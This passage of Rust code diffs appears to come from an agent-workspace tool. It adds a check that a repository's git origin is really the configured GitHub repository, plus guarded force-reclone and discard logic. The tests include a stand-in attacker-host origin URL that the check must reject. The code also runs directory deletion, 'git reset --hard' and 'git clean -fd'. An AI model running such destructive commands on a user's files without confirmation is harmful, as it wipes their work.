+/// (via the `ConfirmIssueOriginMismatch` modal) — the token cannot be
+/// constructed outside this module.
+pub(super) fn remove_workdir(work_dir: &Path, _confirmed: ConfirmedReclone) -> Result<(), String> {
     std::fs::remove_dir_all(work_dir)
         .map_err(|e| format!("Failed to remove workdir {}: {e}", work_dir.display()))
 }

--- a/src/app_input/issue_git_prep.rs
+++ b/src/app_input/issue_git_prep.rs
@@ -55,23 +55,172 @@ pub(super) fn path_exists(work_dir: &Path) -> bool {
 /// and prep flow handle them). Only a **missing** workdir triggers a clone;
 /// an existing non-git directory fails safely.
 pub(super) fn ensure_workdir_cloned(work_dir: &Path, clone_url: Option<&str>) -> PrepResult {
+    let assurance = ensure_workdir_with_origin(work_dir, clone_url, None)?;
+    // No expected shortform → mismatch is impossible, all variants map to Ok.
+    let _ = assurance;
+    Ok(())
+}
+
+/// Remove the working copy directory entirely (for the force-reclone path).
+///
+/// This is destructive: it deletes the entire `work_dir` and all its
+/// contents. The caller must have obtained explicit user confirmation before
+/// invoking this.
+pub(super) fn remove_workdir(work_dir: &Path) -> Result<(), String> {
+    std::fs::remove_dir_all(work_dir)
+        .map_err(|e| format!("Failed to remove workdir {}: {e}", work_dir.display()))
+}
+
+/// Outcome of ensuring a working copy exists with an optional origin check.
+///
+/// Distinguishes three states so the caller can decide whether to proceed,
+/// skip a fresh-clone's dirty check, or prompt the user before clobbering a
+/// foreign repository.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub(super) enum WorkdirAssurance {
+    /// Already a git repo with a matching origin (or no expected shortform to
+    /// compare against). Proceed with the normal prep flow.
+    Ready,
+    /// Was missing and has just been cloned. Proceed (the clone lands on the
+    /// remote's default branch, so the origin already matches by
+    /// construction).
+    JustCloned,
+    /// Exists and is a git repo, but the origin does not match the configured
+    /// repository. The caller must prompt the user before any destructive
+    /// action.
+    OriginMismatch { actual: String, expected: String },
+}
+
+/// Ensure the agent working copy exists, optionally checking that its `origin`
+/// remote matches the configured repository.
+///
+/// Returns:
+/// - [`WorkdirAssurance::Ready`] when `work_dir` is already a git repo and
+///   either no `expected_shortform` was supplied or the origin matches.
+/// - [`WorkdirAssurance::JustCloned`] when `work_dir` was missing and has been
+///   freshly cloned (origin matches by construction).
+/// - [`WorkdirAssurance::OriginMismatch`] when `work_dir` is a git repo but its
+///   origin does not match `expected_shortform` (or has no `origin` remote at
+///   all while an expected shortform IS configured).
+///
+/// # Errors
+///
+/// Returns `Err` with a human-readable message if the path exists but is not a
+/// git worktree, the clone fails, or no clone URL is provided for a missing
+/// workdir.
+pub(super) fn ensure_workdir_with_origin(
+    work_dir: &Path,
+    clone_url: Option<&str>,
+    expected_shortform: Option<&str>,
+) -> Result<WorkdirAssurance, String> {
     if is_git_workdir(work_dir) {
-        return Ok(());
-    }
-    if path_exists(work_dir) {
-        return Err(format!(
+        if let Some(expected) = expected_shortform {
+            let expected = expected.trim();
+            match origin_raw_url(work_dir) {
+                Some(raw_url) if origins_match(&raw_url, expected) => Ok(WorkdirAssurance::Ready),
+                Some(raw_url) => {
+                    // Normalize the raw URL for display in the mismatch modal.
+                    let actual = jefe::git_info::parse_origin_url(&raw_url).unwrap_or_default();
+                    Ok(WorkdirAssurance::OriginMismatch {
+                        actual,
+                        expected: expected.to_owned(),
+                    })
+                }
+                // A git repo with no `origin` remote while an expected
+                // shortform IS configured is a mismatch — it is not the
+                // configured repository.
+                None => Ok(WorkdirAssurance::OriginMismatch {
+                    actual: String::new(),
+                    expected: expected.to_owned(),
+                }),
+            }
+        } else {
+            Ok(WorkdirAssurance::Ready)
+        }
+    } else if path_exists(work_dir) {
+        Err(format!(
             "Working copy {} exists but is not a git worktree.",
             work_dir.display()
-        ));
+        ))
+    } else {
+        let Some(url) = clone_url else {
+            return Err(format!(
+                "Working copy {} does not exist and no valid github_repo (owner/repo) is \
+                 configured to clone from.",
+                work_dir.display()
+            ));
+        };
+        clone_repository(work_dir, url)?;
+        Ok(WorkdirAssurance::JustCloned)
     }
-    let Some(url) = clone_url else {
-        return Err(format!(
-            "Working copy {} does not exist and no valid github_repo (owner/repo) is \
-             configured to clone from.",
-            work_dir.display()
-        ));
+}
+
+/// Read the raw `origin` remote URL of the working copy at `work_dir`.
+///
+/// Runs `git -C <work_dir> remote get-url origin`, trims the output, and
+/// returns the **raw** URL (not normalized). The host-aware comparison in
+/// [`origins_match`] needs the raw URL to verify the host is GitHub.
+/// Returns `None` on git failure or when the URL is empty.
+pub(super) fn origin_raw_url(work_dir: &Path) -> Option<String> {
+    let output = git_capture_optional(work_dir, ["remote", "get-url", "origin"])?;
+    if !output.status.success() {
+        return None;
+    }
+    let url = String::from_utf8_lossy(&output.stdout).trim().to_owned();
+    if url.is_empty() {
+        return None;
+    }
+    Some(url)
+}
+
+/// The expected GitHub host for origin-mismatch comparison. The configured
+/// clone identity always uses `github.com` (see `CloneIdentity::clone_url`).
+const EXPECTED_GITHUB_HOST: &str = "github.com";
+
+/// Host-aware predicate: verify the actual origin URL is on GitHub
+/// (`github.com`) and its `owner/repo` matches the expected shortform.
+///
+/// This is the **central safety check** for issue #190: it prevents operating
+/// against a foreign repository (GitLab, attacker host) that happens to share
+/// the same `owner/repo` path as the configured GitHub repository.
+///
+/// The comparison:
+/// - Parses the raw actual URL via [`jefe::git_info::parse_repository_origin`],
+///   which preserves the **lowercased host**.
+/// - Requires the host to be exactly `github.com` (case-insensitive, already
+///   lowercased by the parser).
+/// - Requires the `owner/repo` to match `expected` **case-insensitively**,
+///   because GitHub repository identity (`owner/repo`) is ASCII
+///   case-insensitive — `Acme/Widgets` and `acme/widgets` refer to the same
+///   repository. Comparing case-sensitively would surface false
+///   mismatch prompts and could encourage users to approve unnecessary
+///   destructive replacements.
+///
+/// # Fail-closed behavior
+///
+/// A bare `owner/repo` actual (no host) is a **mismatch**: a real GitHub
+/// clone always has a host in its `origin` URL, so a bare form means the URL
+/// was manually set or is from an unknown source. Empty/malformed actuals are
+/// also mismatches.
+#[must_use]
+pub(super) fn origins_match(actual_raw_url: &str, expected: &str) -> bool {
+    let expected = expected.trim();
+    if expected.is_empty() {
+        return false;
+    }
+    let Some(parsed) = jefe::git_info::parse_repository_origin(actual_raw_url) else {
+        return false;
     };
-    clone_repository(work_dir, url)
+    parsed.host == EXPECTED_GITHUB_HOST && same_owner_repo(&parsed.owner_repo, expected)
+}
+
+/// Compare two `owner/repo` shortforms case-insensitively (ASCII).
+///
+/// GitHub repository identity is case-insensitive, so `Acme/Widgets` matches
+/// `acme/widgets`. Kept as a named helper so the comparison policy is explicit
+/// and unit-testable in isolation.
+fn same_owner_repo(a: &str, b: &str) -> bool {
+    a.eq_ignore_ascii_case(b)
 }
 
 /// Clone the repository into `work_dir` using the given clone URL.
@@ -581,5 +730,137 @@ mod tests {
     /// production code uses.
     fn is_dirty_from(porcelain: &str) -> bool {
         porcelain_is_dirty(porcelain)
+    }
+
+    // ── origins_match: host-aware predicate (issue #190 MUST-FIX #3) ───
+
+    #[test]
+    fn origins_match_accepts_github_ssh() {
+        assert!(origins_match(
+            "git@github.com:acme/widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_accepts_github_https() {
+        assert!(origins_match(
+            "https://github.com/acme/widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_rejects_gitlab_host() {
+        assert!(!origins_match(
+            "https://gitlab.com/acme/widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_rejects_attacker_host() {
+        assert!(!origins_match(
+            "git@attacker.example:acme/widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_rejects_different_owner() {
+        assert!(!origins_match(
+            "git@github.com:other/widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_rejects_different_repo() {
+        assert!(!origins_match(
+            "git@github.com:acme/gadgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_rejects_bare_form_no_host() {
+        // A bare owner/repo with no host is fail-closed: we cannot verify
+        // it is GitHub, so it must NOT match.
+        assert!(!origins_match("acme/widgets", "acme/widgets"));
+    }
+
+    #[test]
+    fn origins_match_rejects_empty_actual() {
+        assert!(!origins_match("", "acme/widgets"));
+    }
+
+    #[test]
+    fn origins_match_rejects_file_scheme_with_github_authority() {
+        // A file:// URL is a different transport — it reads the local
+        // filesystem, NOT github.com. It must NOT match even though the
+        // authority syntactically reads github.com.
+        assert!(!origins_match(
+            "file://github.com/acme/widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_rejects_unknown_scheme_with_github_authority() {
+        // Git supports pluggable remote helpers for arbitrary schemes. An
+        // unknown scheme like ftp:// or myhelper:// cannot be trusted to
+        // target GitHub even when the host matches.
+        assert!(!origins_match(
+            "ftp://github.com/acme/widgets.git",
+            "acme/widgets"
+        ));
+        assert!(!origins_match(
+            "myhelper://github.com/acme/widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_accepts_ssh_scheme() {
+        assert!(origins_match(
+            "ssh://git@github.com/acme/widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_accepts_git_scheme() {
+        assert!(origins_match(
+            "git://github.com/acme/widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_case_insensitive_owner_repo() {
+        // GitHub repository identity is ASCII case-insensitive: Acme/Widgets
+        // and acme/widgets refer to the same repository. A mixed-case
+        // configured value must NOT surface a false mismatch prompt.
+        assert!(origins_match(
+            "https://github.com/acme/widgets.git",
+            "Acme/Widgets"
+        ));
+        assert!(origins_match(
+            "git@github.com:Acme/Widgets.git",
+            "acme/widgets"
+        ));
+    }
+
+    #[test]
+    fn origins_match_rejects_malformed_actual() {
+        assert!(!origins_match("garbage", "acme/widgets"));
+    }
+
+    #[test]
+    fn origins_match_accepts_uppercase_host() {
+        assert!(origins_match(
+            "https://GitHub.COM/acme/widgets.git",
+            "acme/widgets"
+        ));
     }
 }

--- a/src/app_input/issue_git_prep.rs
+++ b/src/app_input/issue_git_prep.rs
@@ -68,6 +68,45 @@ pub(super) fn ensure_workdir_cloned(work_dir: &Path, clone_url: Option<&str>) ->
     }
 }
 
+/// Validate that `work_dir` is a safe target for a destructive force-reclone.
+///
+/// Rejects targets that would cause catastrophic data loss if removed:
+/// - empty/whitespace-only paths,
+/// - the filesystem root (`/` on Unix, `` on Windows),
+/// - a bare drive root (`C:`) on Windows,
+/// - a path with fewer than two named components (e.g. `/home`, `/tmp`),
+///   which is too broad to remove in an automated reclone.
+///
+/// This is a defense-in-depth guard: the `ConfirmedReclone` token already
+/// proves the user confirmed, but a misconfigured `work_dir` (root, empty,
+/// or a top-level directory) must never reach `rm -rf` even with
+/// confirmation. The check is locale- and platform-independent and has no
+/// side effects.
+pub(super) fn validate_reclone_target(work_dir: &Path) -> Result<(), String> {
+    let lossy = work_dir.to_string_lossy();
+    let trimmed = lossy.trim();
+    if trimmed.is_empty() {
+        return Err("Refusing to force-reclone: work_dir is empty.".to_owned());
+    }
+    // Count named components (Normal). Root/prefix/curdir/parent don't count.
+    // A safe work_dir has at least two named components (e.g. /home/user,
+    // /tmp/agent1), so removing it cannot nuke a top-level OS directory like
+    // /home or /tmp.
+    let named_count = work_dir
+        .components()
+        .filter(|c| matches!(c, std::path::Component::Normal(_)))
+        .count();
+    if named_count < 2 {
+        return Err(format!(
+            "Refusing to force-reclone {}: it resolves to a filesystem root or a top-level \
+             directory, which would delete too much. The work_dir must have at least two path \
+             components.",
+            work_dir.display()
+        ));
+    }
+    Ok(())
+}
+
 /// Zero-sized proof token that the caller has obtained explicit user
 /// confirmation for a destructive workdir replacement.
 ///
@@ -906,5 +945,38 @@ mod tests {
             "https://GitHub.COM/acme/widgets.git",
             "acme/widgets"
         ));
+    }
+
+    // ── validate_reclone_target: catastrophic-target guard ───────────
+
+    #[test]
+    fn validate_reclone_target_rejects_empty() {
+        assert!(validate_reclone_target(Path::new("")).is_err());
+        assert!(validate_reclone_target(Path::new("   ")).is_err());
+    }
+
+    #[test]
+    fn validate_reclone_target_rejects_filesystem_root() {
+        assert!(
+            validate_reclone_target(Path::new("/")).is_err(),
+            "root must be rejected"
+        );
+    }
+
+    #[test]
+    fn validate_reclone_target_rejects_top_level_entry() {
+        // A single component directly under root (no meaningful parent)
+        // is too destructive for an automated reclone.
+        assert!(validate_reclone_target(Path::new("/home")).is_err());
+        assert!(validate_reclone_target(Path::new("/tmp")).is_err());
+    }
+
+    #[test]
+    fn validate_reclone_target_accepts_nested_path() {
+        assert!(
+            validate_reclone_target(Path::new("/home/user/work/agent1")).is_ok(),
+            "a normal nested work_dir must be accepted"
+        );
+        assert!(validate_reclone_target(Path::new("/srv/repos/jefe/agents/a1")).is_ok(),);
     }
 }

--- a/src/app_input/issue_git_prep.rs
+++ b/src/app_input/issue_git_prep.rs
@@ -96,8 +96,15 @@ impl ConfirmedReclone {
 /// contents. The required [`ConfirmedReclone`] token is the compile-time
 /// guarantee that the caller has already obtained explicit user confirmation
 /// (via the `ConfirmIssueOriginMismatch` modal) — the token cannot be
-/// constructed outside this module.
-pub(super) fn remove_workdir(work_dir: &Path, _confirmed: ConfirmedReclone) -> Result<(), String> {
+/// constructed outside this module. The parameter is named without an
+/// underscore prefix deliberately: its presence (not its value) IS the
+/// safety contract, so an underscore would misleadingly suggest it is unused.
+pub(super) fn remove_workdir(work_dir: &Path, confirmed: ConfirmedReclone) -> Result<(), String> {
+    // The token's presence at the call site is the proof; it is not read
+    // here. Binding it by name (then discarding) avoids an unused-variable
+    // warning while keeping the parameter name (and thus the contract)
+    // self-documenting.
+    let _ = confirmed;
     std::fs::remove_dir_all(work_dir)
         .map_err(|e| format!("Failed to remove workdir {}: {e}", work_dir.display()))
 }

--- a/src/app_input/issue_git_prep.rs
+++ b/src/app_input/issue_git_prep.rs
@@ -119,8 +119,14 @@ pub(super) fn ensure_workdir_with_origin(
             match origin_raw_url(work_dir) {
                 Some(raw_url) if origins_match(&raw_url, expected) => Ok(WorkdirAssurance::Ready),
                 Some(raw_url) => {
-                    // Normalize the raw URL for display in the mismatch modal.
-                    let actual = jefe::git_info::parse_origin_url(&raw_url).unwrap_or_default();
+                    // Display the normalized owner/repo when it parses, else
+                    // the raw URL — so a malformed/unexpected origin (not just
+                    // a missing one) surfaces a diagnosable actual value
+                    // rather than an empty string indistinguishable from
+                    // "no origin".
+                    let actual = jefe::git_info::parse_origin_url(&raw_url)
+                        .filter(|s| !s.is_empty())
+                        .unwrap_or_else(|| raw_url.clone());
                     Ok(WorkdirAssurance::OriginMismatch {
                         actual,
                         expected: expected.to_owned(),

--- a/src/app_input/issue_prep.rs
+++ b/src/app_input/issue_prep.rs
@@ -29,13 +29,13 @@
 //! launch path takes any lock.
 
 use std::path::Path;
-use std::process::{Command, Stdio};
 
 use jefe::domain::RemoteRepositorySettings;
 
 use super::clone_identity::CloneIdentity;
 use super::issue_git_prep::{
-    discard_workdir_changes, ensure_workdir_cloned, is_workdir_dirty, prepare_issue_workdir,
+    WorkdirAssurance, discard_workdir_changes, ensure_workdir_cloned, ensure_workdir_with_origin,
+    is_workdir_dirty, prepare_issue_workdir, remove_workdir,
 };
 
 /// Relative path of the issue prompt inside the work dir. This is the single
@@ -64,6 +64,10 @@ pub(super) enum PrepOutcome {
     /// The working copy is dirty and the policy is `Stop`. The worktree is
     /// untouched; the caller should open the dirty-copy confirm modal.
     Dirty,
+    /// The working copy is a git repo whose `origin` does not match the
+    /// configured repository. The caller must open the origin-mismatch
+    /// confirm modal.
+    OriginMismatch { actual: String, expected: String },
 }
 
 /// Where prep operations execute.
@@ -121,6 +125,77 @@ pub(super) fn prepare_issue_target(
     }
 }
 
+/// Force-reclone a mismatched working copy, then proceed with normal
+/// post-clone prep.
+///
+/// This is the opt-in action for the origin-mismatch confirm modal (issue
+/// #190). It removes the mismatched workdir entirely and re-clones from the
+/// configured identity, then runs the post-clone prep (no dirty-check — a
+/// fresh clone is clean). The caller must have obtained explicit user
+/// confirmation before invoking this.
+///
+/// **Ordering invariant (MUST-FIX #2):** the identity is a **required**
+/// parameter (not `Option`), so the clone URL is resolved BEFORE the workdir
+/// is removed. The removal can never happen without a valid replacement URL.
+///
+/// # Errors
+///
+/// Returns a human-readable error string if the remove, clone, or prep fails.
+pub(super) fn prepare_issue_target_force_reclone(
+    target: &WorkTarget,
+    work_dir: &Path,
+    identity: &CloneIdentity,
+    prompt: &str,
+) -> Result<PrepOutcome, String> {
+    match target {
+        WorkTarget::Local => prepare_local_force_reclone(work_dir, identity, prompt),
+        WorkTarget::Remote(remote) => {
+            prepare_remote_force_reclone(remote, work_dir, identity, prompt)
+        }
+    }
+}
+
+/// Local force-reclone: resolve clone URL → remove → clone → post-clone prep.
+///
+/// **Ordering invariant (MUST-FIX #2):** the clone URL is resolved from the
+/// required `identity` BEFORE the workdir is removed. Since `identity` is a
+/// non-optional `&CloneIdentity`, removal can never happen without a valid
+/// replacement URL — the old bug (destroy then fail with "no identity") is
+/// impossible by construction.
+fn prepare_local_force_reclone(
+    work_dir: &Path,
+    identity: &CloneIdentity,
+    prompt: &str,
+) -> Result<PrepOutcome, String> {
+    // 1. Resolve the clone URL BEFORE any destructive action.
+    let clone_url = identity.clone_url();
+    force_reclone_local_with_url(work_dir, &clone_url, prompt)
+}
+
+/// The destructive force-reclone sequence with an already-resolved clone URL:
+/// remove the workdir → clone → post-clone prep.
+///
+/// Split from [`prepare_local_force_reclone`] so the sequence (remove → clone
+/// → prep) is exercisable in tests against a local clone source (a bare repo
+/// path), independent of the HTTPS-only `CloneIdentity::clone_url`. Production
+/// always enters via [`prepare_local_force_reclone`], which resolves the URL
+/// from a validated identity first — guaranteeing the URL is known before the
+/// destructive removal.
+pub(super) fn force_reclone_local_with_url(
+    work_dir: &Path,
+    clone_url: &str,
+    prompt: &str,
+) -> Result<PrepOutcome, String> {
+    // Remove the mismatched workdir.
+    if work_dir.exists() {
+        remove_workdir(work_dir)?;
+    }
+    // Clone from the resolved URL.
+    ensure_workdir_cloned(work_dir, Some(clone_url))?;
+    // Post-clone prep (dirty-check is Stop, but a fresh clone is clean).
+    run_local_policy_and_prep(work_dir, DirtyPolicy::Stop, prompt)
+}
+
 /// Local-target prep sequence.
 fn prepare_local(
     work_dir: &Path,
@@ -129,7 +204,13 @@ fn prepare_local(
     prompt: &str,
 ) -> Result<PrepOutcome, String> {
     let owned_url = identity.map(CloneIdentity::clone_url);
-    ensure_workdir_cloned(work_dir, owned_url.as_deref())?;
+    let expected = identity.map(CloneIdentity::expected_shortform);
+    match ensure_workdir_with_origin(work_dir, owned_url.as_deref(), expected)? {
+        WorkdirAssurance::Ready | WorkdirAssurance::JustCloned => {}
+        WorkdirAssurance::OriginMismatch { actual, expected } => {
+            return Ok(PrepOutcome::OriginMismatch { actual, expected });
+        }
+    }
     run_local_policy_and_prep(work_dir, policy, prompt)
 }
 
@@ -241,7 +322,7 @@ fn write_prompt_remote_generic(
     relative_path: &str,
     prompt_bytes: &[u8],
 ) -> Result<(), String> {
-    let runner = RemotePrepRunner::new(remote.clone());
+    let runner = remote::RemotePrepRunner::new(remote.clone());
     runner.write_prompt(work_dir, relative_path, prompt_bytes)
 }
 
@@ -266,582 +347,26 @@ fn prepare_remote(
     policy: DirtyPolicy,
     prompt: &str,
 ) -> Result<PrepOutcome, String> {
-    let runner = RemotePrepRunner::new(remote.clone());
+    let runner = remote::RemotePrepRunner::new(remote.clone());
     runner.run(work_dir, identity, policy, prompt)
 }
 
-/// A pure planner that records the remote commands and prompt-transfer plan
-/// **without** executing them. Exposed for deterministic tests proving all
-/// operations target the remote host, use `ssh -T`, and transfer prompt bytes
-/// via stdin.
-#[cfg(test)]
-#[derive(Debug, Clone)]
-pub(super) struct RemotePrepPlanner {
-    remote: RemoteRepositorySettings,
-}
-
-/// Inputs driving the pure remote-command planner. Bundled into a struct so
-/// the planner signature stays under the project's argument-count limit
-/// (`clippy::too_many_arguments`).
-#[cfg(test)]
-#[derive(Debug, Clone)]
-pub(super) struct PlanInputs<'a> {
-    /// Work dir the clone/checkout targets.
-    pub work_dir: &'a Path,
-    /// Validated clone identity (HTTPS URL), if any.
-    pub identity: Option<&'a CloneIdentity>,
-    /// Dirty-copy handling policy.
-    pub policy: DirtyPolicy,
-    /// The remote work dir already exists and is a git worktree.
-    pub exists_is_git: bool,
-    /// The remote work dir exists but is **not** a git worktree.
-    pub exists_not_git: bool,
-    /// The remote work dir is dirty (meaningful only when `exists_is_git`).
-    pub is_dirty: bool,
-    /// Prompt bytes to transfer via stdin.
-    pub prompt: &'a str,
-}
-
-/// A single recorded remote operation (for test verification).
-#[cfg(test)]
-#[derive(Debug, Clone, PartialEq, Eq)]
-pub(super) struct PlannedRemoteOp {
-    /// The `ssh -T` argv (everything after the `ssh` binary).
-    pub ssh_argv: Vec<String>,
-    /// Prompt bytes sent via stdin, if this op transfers the prompt.
-    pub stdin_prompt: Option<String>,
-}
-
-#[cfg(test)]
-impl RemotePrepPlanner {
-    /// Create a planner for the given remote settings.
-    #[must_use]
-    pub(super) fn new(remote: RemoteRepositorySettings) -> Self {
-        Self { remote }
-    }
-
-    /// Plan the full remote prep sequence for the given state, returning the
-    /// ordered list of `ssh -T` operations that would be executed.
-    ///
-    /// The sequence mirrors the local prep:
-    /// 1. detect git worktree (if not, clone if identity present);
-    /// 2. dirty check;
-    /// 3. if dirty and Discard, reset+clean;
-    /// 4. resolve default branch, fetch, checkout;
-    /// 5. mkdir .jefe + write prompt via stdin.
-    ///
-    /// This is pure — it does not inspect the remote filesystem. Callers
-    /// supply `exists_is_git`, `exists_not_git`, and `is_dirty` to drive the
-    /// branching deterministically.
-    #[must_use]
-    pub(super) fn plan(&self, inputs: &PlanInputs<'_>) -> Vec<PlannedRemoteOp> {
-        let mut ops = Vec::new();
-        let escaped_work = shell_escape(&inputs.work_dir.to_string_lossy());
-        let PlanInputs {
-            work_dir,
-            identity,
-            policy,
-            exists_is_git,
-            exists_not_git,
-            is_dirty,
-            prompt,
-        } = inputs;
-
-        // 1. Clone if missing.
-        if !*exists_is_git && !*exists_not_git {
-            // Path absent → clone if identity present.
-            if let Some(id) = identity {
-                let url = id.clone_url();
-                let script = format!(
-                    "set -e; {mkdir_parent} git clone -- {url} {escaped_work}",
-                    mkdir_parent = mkdir_parent_for(work_dir),
-                    url = shell_escape(&url),
-                );
-                ops.push(self.wrapped_ssh_op(&script, None));
-            }
-        }
-
-        // 2. Dirty check.
-        if *exists_is_git || !*exists_not_git {
-            // After clone the worktree is clean; only check dirty when it
-            // pre-existed as a git worktree.
-            if *exists_is_git && *is_dirty {
-                match policy {
-                    DirtyPolicy::Stop => {
-                        // Stop: no further ops. The caller opens the confirm
-                        // modal; no reset/clean is planned.
-                        return ops;
-                    }
-                    DirtyPolicy::Discard => {
-                        // Discard: reset --hard + clean -fd with exclusions.
-                        let script = format!(
-                            "set -e; cd {escaped_work}; \
-                             git reset --hard; \
-                             git clean -fd -e {jefe} -e {jefe_glob} -e {llx} -e {llx_glob}",
-                            jefe = shell_escape(".jefe/"),
-                            jefe_glob = shell_escape(".jefe/**"),
-                            llx = shell_escape(".llxprt/"),
-                            llx_glob = shell_escape(".llxprt/**"),
-                        );
-                        ops.push(self.wrapped_ssh_op(&script, None));
-                    }
-                }
-            }
-
-            // 4. Resolve default branch + fetch + checkout. The linked-worktree
-            // fallback resets only when the worktree is on the desired branch.
-            let script = format!(
-                "set -e; cd {escaped_work}; \
-                 branch=$(git symbolic-ref refs/remotes/origin/HEAD | sed 's@^refs/remotes/origin/@@'); \
-                 git fetch origin \"$branch\"; \
-                 if git checkout -B \"$branch\" \"origin/$branch\" -- 2>/dev/null; then \
-                     :; \
-                 elif [ \"$(git rev-parse --abbrev-ref HEAD)\" = \"$branch\" ]; then \
-                     git reset --hard \"origin/$branch\"; \
-                 else \
-                     echo \"Cannot reset to origin/$branch: worktree is on a different branch\" >&2; \
-                     exit 1; \
-                 fi",
-            );
-            ops.push(self.wrapped_ssh_op(&script, None));
-
-            // 5. mkdir .jefe + write prompt via stdin (cat > file).
-            let prompt_path = format!("{escaped_work}/{ISSUE_PROMPT_RELATIVE_PATH}");
-            let script = format!(
-                "set -e; mkdir -p {jefe_dir}; cat > {prompt_path}",
-                jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy()),
-                prompt_path = prompt_path,
-            );
-            ops.push(self.wrapped_ssh_op(&script, Some((*prompt).to_owned())));
-        }
-
-        ops
-    }
-
-    /// Build a single planned `ssh -T` operation.
-    fn ssh_op(&self, remote_command: &str, stdin_prompt: Option<String>) -> PlannedRemoteOp {
-        let ssh_argv = self.ssh_argv(remote_command);
-        PlannedRemoteOp {
-            ssh_argv,
-            stdin_prompt,
-        }
-    }
-
-    /// Build a planned op from an unwrapped script, applying the effective-user
-    /// wrapper first (binds the owned String so the borrow is valid).
-    fn wrapped_ssh_op(&self, script: &str, stdin_prompt: Option<String>) -> PlannedRemoteOp {
-        let wrapped = wrap_effective_user(&self.remote, script);
-        self.ssh_op(&wrapped, stdin_prompt)
-    }
-
-    /// Build the `ssh -T` argv for a remote command.
-    fn ssh_argv(&self, remote_command: &str) -> Vec<String> {
-        vec![
-            "-o".to_owned(),
-            "BatchMode=yes".to_owned(),
-            "-o".to_owned(),
-            "ConnectTimeout=10".to_owned(),
-            // -T: disable PTY allocation for noninteractive prep/file
-            // transfer. This is distinct from the -tt used for tmux
-            // operations in runtime::commands.
-            "-T".to_owned(),
-            // `--` ends option parsing (defense in depth; identity
-            // validation is the primary guard).
-            "--".to_owned(),
-            format!(
-                "{}@{}",
-                self.remote.login_user.trim(),
-                self.remote.host.trim()
-            ),
-            remote_command.to_owned(),
-        ]
-    }
-}
-
-/// Sentinel printed by a remote predicate probe when the condition is true.
-const PREDICATE_TRUE: &str = "JEFE_PREDICATE_TRUE";
-/// Sentinel printed by a remote predicate probe when the condition is false.
-const PREDICATE_FALSE: &str = "JEFE_PREDICATE_FALSE";
-
-/// Classify the raw output of a sentinel-based remote predicate probe.
+/// Remote force-reclone: validate identity → resolve URL → remove → clone → prep over SSH.
 ///
-/// The probe script must always print exactly one sentinel
-/// (`JEFE_PREDICATE_TRUE` or `JEFE_PREDICATE_FALSE`) and exit 0. This pure
-/// classifier enforces the protocol:
-///
-/// - Exit 0 with trimmed stdout exactly `JEFE_PREDICATE_TRUE` → `Ok(true)`.
-/// - Exit 0 with trimmed stdout exactly `JEFE_PREDICATE_FALSE` → `Ok(false)`
-///   (a safe, normal false predicate — NOT an error).
-/// - SSH exit 255 → `Err` (transport/auth/host failure).
-/// - Any other nonzero exit → `Err` (sudo/shell/auth failure).
-/// - Exit 0 with prefix/suffix/both sentinels/empty/malformed output → `Err`
-///   (protocol mismatch or banner injection — never cause a clone).
-///
-/// This is **fail-closed**: any ambiguity is an `Err`, so infrastructure
-/// failures never masquerade as a safe `false` predicate.
-fn classify_predicate_output(
-    exit_code: Option<i32>,
-    stdout: &str,
-    stderr: &str,
-) -> Result<bool, String> {
-    match exit_code {
-        Some(0) => {
-            let trimmed = stdout.trim();
-            if trimmed == PREDICATE_TRUE {
-                Ok(true)
-            } else if trimmed == PREDICATE_FALSE {
-                Ok(false)
-            } else {
-                Err(format!(
-                    "remote predicate returned unexpected output (expected exactly one sentinel): \
-                     stdout={stdout:?} stderr={stderr:?}"
-                ))
-            }
-        }
-        Some(255) => Err(format!(
-            "SSH transport/auth/host failure (exit 255): {}",
-            stderr.trim()
-        )),
-        Some(code) => Err(format!(
-            "remote predicate probe failed (exit {code}): {}",
-            stderr.trim()
-        )),
-        None => Err("remote predicate probe terminated by signal".to_owned()),
-    }
-}
-
-/// Wrap a condition command in the sentinel protocol so it always exits 0
-/// (shell success) after printing exactly one sentinel.
-///
-/// The wrapped script runs `<condition>` and prints `JEFE_PREDICATE_TRUE`
-/// when it succeeds or `JEFE_PREDICATE_FALSE` when it fails — in both cases
-/// the script itself exits 0. This lets the caller distinguish a legitimate
-/// false predicate from an infrastructure failure via [`classify_predicate_output`].
-fn wrap_predicate(condition: &str) -> String {
-    format!(
-        "{{ {condition}; }} && printf '%s' {sentinel_true} || printf '%s' {sentinel_false}",
-        sentinel_true = shell_escape(PREDICATE_TRUE),
-        sentinel_false = shell_escape(PREDICATE_FALSE),
-    )
-}
-
-/// The live SSH runner. Executes the planned sequence against the real remote.
-struct RemotePrepRunner {
-    remote: RemoteRepositorySettings,
-}
-
-impl RemotePrepRunner {
-    fn new(remote: RemoteRepositorySettings) -> Self {
-        Self { remote }
-    }
-
-    /// Execute the remote prep sequence.
-    ///
-    /// Determined at runtime by querying the remote host: detect whether the
-    /// work dir is a git worktree, then branch accordingly.
-    fn run(
-        &self,
-        work_dir: &Path,
-        identity: Option<&CloneIdentity>,
-        policy: DirtyPolicy,
-        prompt: &str,
-    ) -> Result<PrepOutcome, String> {
-        let escaped_work = shell_escape(&work_dir.to_string_lossy());
-
-        // 1. Detect git worktree on the remote. Use `git -C rev-parse
-        // --is-inside-work-tree` instead of `test -d .git` to support linked
-        // worktrees where `.git` is a file, not a directory.
-        let exists = self.run_remote_check(&format!("test -d {escaped_work}"))?;
-        if exists {
-            let is_git = self.run_remote_check(&format!(
-                "git -C {escaped_work} rev-parse --is-inside-work-tree 2>/dev/null | grep -qx true"
-            ))?;
-            if !is_git {
-                return Err(format!(
-                    "Remote path {} exists but is not a git worktree",
-                    work_dir.display()
-                ));
-            }
-        } else {
-            // 2. Clone if missing.
-            let Some(id) = identity else {
-                return Err(format!(
-                    "Remote working copy {} does not exist and no valid github_repo \
-                     (owner/repo) is configured to clone from.",
